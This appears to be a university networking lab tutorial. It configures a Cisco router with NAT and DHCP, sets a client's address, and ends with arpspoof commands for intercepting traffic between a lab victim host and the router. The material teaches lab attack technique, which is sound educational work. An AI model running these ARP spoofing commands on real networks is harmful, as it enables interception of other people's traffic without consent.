# Tutorial 1
## Physical Setup

![](./network_connection.png)

## Router Configuration
  - `XX`: Workplace number

```sh
# Enter configuration
enable
configure terminal

# Assign ip addresses
interface gi0/0
ip address 10.3.44.1XX 255.255.255.0
ip nat outside
no shutdown

interface gi0/1
ip address 192.168.1.1 255.255.255.0
ip nat inside
no shutdown

# Enable network address translation
# ip nat pool <name> <start-ip> <end-ip> { netmask <netmask> | prefix-length <prefix-length> } [ type { rotary } ]
ip nat pool okayletsgo 10.3.44.1XX 10.3.44.1XX netmask 255.255.255.0

# access-list acln {deny|permit} {host|source source-wildcard|any}
access-list 24 permit 192.168.1.0 0.0.0.255

# ip nat inside source { list <acln> pool <name> [overload] | static <local-ip><global-ip> }
ip nat inside source list 24 pool okayletsgo overload

# Configure DHCP
ip dhcp excluded-address 192.168.1.1 192.168.1.1
ip dhcp pool AddSomeProtein
network 192.168.1.0 255.255.255.0
default-router 192.168.1.1
dns-server 208.67.222.222
exit

# Enable DHCP for inner network
service dhcp gi0/1
exit
configure terminal

# Set default gateway
ip route 0.0.0.0 0.0.0.0 10.3.44.1
exit
disable
```

## Client Configuration
  - `X`: Workplace number

```sh
sudo -i
ifconfig eth0 192.168.1.1X netmask 255.255.255.0
# watch the result using the command below
ip addr show
```

## ARP Spoofing
```sh
# sudo arpspoof -i [interface] -t <victim> <victim's-target>
# Spy traffic from victim to router
sudo arpspoof -i eth0 -t 192.168.1.11 192.168.1.1
# Spy traffic from router to victim
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.11
```
